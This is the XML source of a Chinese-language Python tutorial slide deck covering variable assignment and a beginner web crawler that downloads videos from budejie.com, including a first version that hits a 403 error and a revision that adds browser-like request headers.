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48.jpg" ContentType="image/gif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373" r:id="rId2"/>
    <p:sldId id="400" r:id="rId3"/>
    <p:sldId id="355" r:id="rId4"/>
    <p:sldId id="388" r:id="rId5"/>
    <p:sldId id="377" r:id="rId6"/>
    <p:sldId id="370" r:id="rId7"/>
    <p:sldId id="417" r:id="rId8"/>
    <p:sldId id="348" r:id="rId9"/>
    <p:sldId id="310" r:id="rId10"/>
    <p:sldId id="342" r:id="rId11"/>
    <p:sldId id="309" r:id="rId12"/>
    <p:sldId id="402" r:id="rId13"/>
    <p:sldId id="437" r:id="rId14"/>
    <p:sldId id="401" r:id="rId15"/>
    <p:sldId id="403" r:id="rId16"/>
    <p:sldId id="312" r:id="rId17"/>
    <p:sldId id="404" r:id="rId18"/>
    <p:sldId id="313" r:id="rId19"/>
    <p:sldId id="331" r:id="rId20"/>
    <p:sldId id="405" r:id="rId21"/>
    <p:sldId id="314" r:id="rId22"/>
    <p:sldId id="317" r:id="rId23"/>
    <p:sldId id="407" r:id="rId24"/>
    <p:sldId id="406" r:id="rId25"/>
    <p:sldId id="285" r:id="rId26"/>
    <p:sldId id="399" r:id="rId27"/>
    <p:sldId id="398" r:id="rId28"/>
    <p:sldId id="423" r:id="rId29"/>
    <p:sldId id="378" r:id="rId30"/>
    <p:sldId id="389" r:id="rId31"/>
    <p:sldId id="395" r:id="rId32"/>
    <p:sldId id="394" r:id="rId33"/>
    <p:sldId id="379" r:id="rId34"/>
    <p:sldId id="380" r:id="rId35"/>
    <p:sldId id="319" r:id="rId36"/>
    <p:sldId id="322" r:id="rId37"/>
    <p:sldId id="321" r:id="rId38"/>
    <p:sldId id="328" r:id="rId39"/>
    <p:sldId id="344" r:id="rId40"/>
    <p:sldId id="387" r:id="rId41"/>
    <p:sldId id="427" r:id="rId42"/>
    <p:sldId id="345" r:id="rId43"/>
    <p:sldId id="343" r:id="rId44"/>
    <p:sldId id="429" r:id="rId45"/>
    <p:sldId id="305" r:id="rId46"/>
    <p:sldId id="288" r:id="rId47"/>
    <p:sldId id="287" r:id="rId48"/>
    <p:sldId id="397" r:id="rId49"/>
    <p:sldId id="293" r:id="rId50"/>
    <p:sldId id="302" r:id="rId51"/>
    <p:sldId id="303" r:id="rId52"/>
    <p:sldId id="307" r:id="rId53"/>
    <p:sldId id="308" r:id="rId54"/>
    <p:sldId id="286" r:id="rId55"/>
    <p:sldId id="289" r:id="rId56"/>
    <p:sldId id="426" r:id="rId57"/>
    <p:sldId id="413" r:id="rId58"/>
    <p:sldId id="341" r:id="rId59"/>
    <p:sldId id="414" r:id="rId60"/>
    <p:sldId id="438" r:id="rId61"/>
    <p:sldId id="347" r:id="rId62"/>
    <p:sldId id="412" r:id="rId63"/>
    <p:sldId id="353" r:id="rId64"/>
    <p:sldId id="352" r:id="rId65"/>
    <p:sldId id="418" r:id="rId66"/>
    <p:sldId id="332" r:id="rId67"/>
    <p:sldId id="384" r:id="rId68"/>
    <p:sldId id="334" r:id="rId69"/>
    <p:sldId id="338" r:id="rId70"/>
    <p:sldId id="340" r:id="rId71"/>
    <p:sldId id="333" r:id="rId72"/>
    <p:sldId id="336" r:id="rId73"/>
    <p:sldId id="425" r:id="rId74"/>
    <p:sldId id="329" r:id="rId75"/>
    <p:sldId id="339" r:id="rId76"/>
    <p:sldId id="419" r:id="rId77"/>
    <p:sldId id="350" r:id="rId78"/>
    <p:sldId id="359" r:id="rId79"/>
    <p:sldId id="358" r:id="rId80"/>
    <p:sldId id="356" r:id="rId81"/>
    <p:sldId id="360" r:id="rId82"/>
    <p:sldId id="363" r:id="rId83"/>
    <p:sldId id="361" r:id="rId84"/>
    <p:sldId id="393" r:id="rId85"/>
    <p:sldId id="408" r:id="rId86"/>
    <p:sldId id="410" r:id="rId87"/>
    <p:sldId id="439" r:id="rId88"/>
    <p:sldId id="382" r:id="rId89"/>
    <p:sldId id="443" r:id="rId90"/>
    <p:sldId id="431" r:id="rId91"/>
    <p:sldId id="337" r:id="rId92"/>
    <p:sldId id="441" r:id="rId93"/>
    <p:sldId id="442" r:id="rId94"/>
    <p:sldId id="349" r:id="rId95"/>
    <p:sldId id="375" r:id="rId96"/>
    <p:sldId id="374" r:id="rId97"/>
    <p:sldId id="297" r:id="rId98"/>
    <p:sldId id="298" r:id="rId99"/>
    <p:sldId id="294" r:id="rId100"/>
    <p:sldId id="369" r:id="rId101"/>
    <p:sldId id="364" r:id="rId102"/>
    <p:sldId id="365" r:id="rId103"/>
    <p:sldId id="368" r:id="rId104"/>
    <p:sldId id="420" r:id="rId105"/>
    <p:sldId id="266" r:id="rId106"/>
    <p:sldId id="324" r:id="rId107"/>
    <p:sldId id="385" r:id="rId108"/>
    <p:sldId id="326" r:id="rId109"/>
    <p:sldId id="325" r:id="rId110"/>
    <p:sldId id="327" r:id="rId111"/>
    <p:sldId id="316" r:id="rId112"/>
    <p:sldId id="315" r:id="rId113"/>
    <p:sldId id="432" r:id="rId114"/>
    <p:sldId id="383" r:id="rId115"/>
    <p:sldId id="386" r:id="rId116"/>
    <p:sldId id="435" r:id="rId117"/>
    <p:sldId id="436" r:id="rId118"/>
    <p:sldId id="440" r:id="rId119"/>
    <p:sldId id="444" r:id="rId1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00"/>
    <a:srgbClr val="04A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3276" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="89" d="100"/>
          <a:sy n="89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1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1E2E-6F6B-48CE-864E-880ED0C8CACC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FE1A-5A6A-49DD-BE1B-89D88D6FC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6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5E7E-CDFD-4291-8AA5-23E398A353D3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84A6D-4651-4986-A173-6232A1AFF5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4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89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110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1277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504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200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314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249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942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5251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278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730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4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0886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99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834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508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431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7319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300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7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4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6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70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338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8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94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53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40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0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74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13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5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546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3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14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679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8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08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74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068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8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45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46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66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83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26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38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88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00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2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634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7388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379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4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77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04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8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265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574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384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498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963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23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920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29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7709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87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2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19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9511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06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1932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267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760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123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14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677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0723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44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1485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966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8946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264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840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369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288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512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6159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217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24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004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988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749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54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849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2967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44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0639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56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404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3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5062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7979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048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352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6633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3224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605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334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563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412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84A6D-4651-4986-A173-6232A1AFF5C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1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571"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr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1494"/>
            <a:ext cx="8229600" cy="3394472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defRPr sz="14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11 Image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5291" y="4808227"/>
            <a:ext cx="361033" cy="304028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="12 Image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698" y="4808227"/>
            <a:ext cx="361033" cy="304028"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="14 CuadroTexto"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7964424" y="482010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sz="1200" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of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12" name="15 CuadroTexto"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8203765" y="481016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115</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Imagen 6" descr="C:\Users\Design\Documents\Edu\Product Launch\btns.pn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60" y="4870375"/>
            <a:ext cx="177229" cy="1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6" descr="C:\Users\Design\Documents\Edu\Product Launch\btns.pn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30975" y="4870375"/>
            <a:ext cx="177229" cy="1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g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operatingsyste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ms.csdnimg.cn/article/201307/04/51d4e0d941d31.jpg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#isinstance" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.python.org/3/library/functions.html#float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functions.html#bool" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.python.org/3/library/functions.html#issubclass" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.python.org/3/library/functions.html#in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51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7041" y="149959"/>
            <a:ext cx="30979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变量及赋值</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="矩形 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="221843" y="771636"/>
            <a:ext cx="65260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是动态类型语言，在第一次赋值时自动声明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每个值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而不是变量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都有一个唯一的标识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任何变量名之间的赋值都是引用的赋值</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="221843" y="2211710"/>
            <a:ext cx="45098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变量的赋值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string1 = "hello"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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增量赋值：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+= 1 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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多重赋值：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y = z = 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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多元赋值：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x, y, z = 1, 2, "hello"</a:t>
            </a:r>
            <a:b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x, y, z) = (1, 2, "hello")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r="3337" b="2578"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4283968" y="1996959"/>
            <a:ext cx="3975187" cy="21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06277" y="48230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38771" y="187655"/>
            <a:ext cx="29650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案例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烂大街的网络爬虫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7513" y="1287973"/>
            <a:ext cx="3037767" cy="13254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096" y="2806492"/>
            <a:ext cx="2965630" cy="18234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681" y="1747762"/>
            <a:ext cx="2776537" cy="1459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6" y="3579862"/>
            <a:ext cx="3516210" cy="9817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776" y="1309138"/>
            <a:ext cx="46456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Python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爬虫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= Python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库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+ Http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协议工作流程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+ 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正则表达式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4"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3763269" y="2283718"/>
            <a:ext cx="1234192" cy="11682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3528" y="559787"/>
            <a:ext cx="8640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网络爬虫可以理解为在网络上爬行的蜘蛛，互联网就比作一张大网，遇到资源就可以抓取下来。比如它在抓取一个网页，在这个网中他发现了一条道路(指向网页的超链接)，那么它就可以爬到另一张网上来获取数据。这样整个连在一起的大网对这之蜘蛛来说触手可及，分分钟爬下来不是事儿。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3890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080" y="790625"/>
            <a:ext cx="3240360" cy="3192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网络爬虫编写步骤：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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、导入模板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、获取网页地址单页或多页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、获取网页源代码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、下载对应的标题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、匹配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、调用函数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06277" y="48230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9484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案例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网络小爬虫编写步骤</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="内容占位符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r="1955" b="10010"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="467544" y="790625"/>
            <a:ext cx="4355143" cy="33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86217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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>网络小爬虫初始版</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="矩形 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323529" y="620662"/>
            <a:ext cx="352839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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>获取网址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get_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(page):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>      return 'http://www.budejie.com/video/'+str(page)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获取源代码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get_html_s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req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>      return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>urllib.request.urlopen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req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>).read().decode('utf-8')</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US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下载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download(mp4_url,filename):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>       filename="".join(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>filename.split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>())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urllib.urlretrieve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(mp4_url,'%s.mp4' %(filename))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匹配地址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get_mpl_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(request):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=r'data-mp4="(.*?)"'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>       return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>re.findall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reg,request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>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匹配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get_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(request):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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>re.compile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(r'&lt;div class="j-r-list-c-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>desc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>"&gt;\s+&lt;a     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>="/detail-[0-9]+.html"&gt;\s*(.*?)\s*&lt;/a&gt;',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>re.S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 return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>re.findall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reg,request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3995936" y="688302"/>
            <a:ext cx="248216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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>调用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>html=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>get_html_s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req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mp4_url=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>get_mpl_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(html)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>mp4_name=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>get_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(html)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异常处理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>     for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>x,y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> in zip(mp4_url,mp4_name):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>     if '|' in y:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> continue</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>     download(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>x,y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except Exception as e:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>     print(e)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6516163" y="688302"/>
            <a:ext cx="238060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/>
              <a:t> Python2.7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" b="1" dirty="0"/>
              <a:t>运行结果：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>&lt;!DOCTYPE html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> &lt;head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> &lt;title&gt;403 &lt;/title&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> &lt;/head&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> &lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> &lt;h1&gt;Error 403 &lt;/h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> &lt;p&gt; &lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> &lt;h3&gt;Guru Meditation:&lt;/h3&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> &lt;p&gt;XID: 841422629&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>hr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> &lt;p&gt;Varnish cache server&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t> &lt;/body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>&lt;/html&gt;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200" b="1" dirty="0"/>
              <a:t>403 Forbidden(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>禁止</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" b="1" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>原因：太直接，没有伪装成浏览器</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248166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79575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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>网络小爬虫改进版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699542"/>
            <a:ext cx="36724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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>获取网址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get_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(page):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>      return 'http://www.budejie.com/video/'+str(page)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获取源代码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get_html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):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>      return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>urllib.urlopen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).read()#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>获取网页源码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US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获取源代码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get_html_s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req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>      return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>urllib.request.urlopen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req</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>).read().decode('utf-8')</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US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下载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download(mp4_url,filename):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>       filename="".join(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>filename.split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>())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urllib.request.urlretrieve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(mp4_url,'%s.mp4' %(filename))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匹配地址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get_mpl_url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(request):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=r'data-mp4="(.*?)"'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>       return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>re.findall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reg,request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4283968" y="579685"/>
            <a:ext cx="439248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#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/>
              <a:t>匹配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get_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(request):</a:t>
            </a:r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=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>re.compile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>(r'&lt;div class="j-r-list-c-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>desc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>"&gt;\s+&lt;a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>="/detail-[0-9]+.html"&gt;\s*(.*?)\s*&lt;/a&gt;',</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>re.S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      return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>re.findall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reg,request</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1100" dirty="0"/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调用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0" err="1"/>
              <a:t>my_headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
              <a:t>=[</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1100" dirty="0"/>
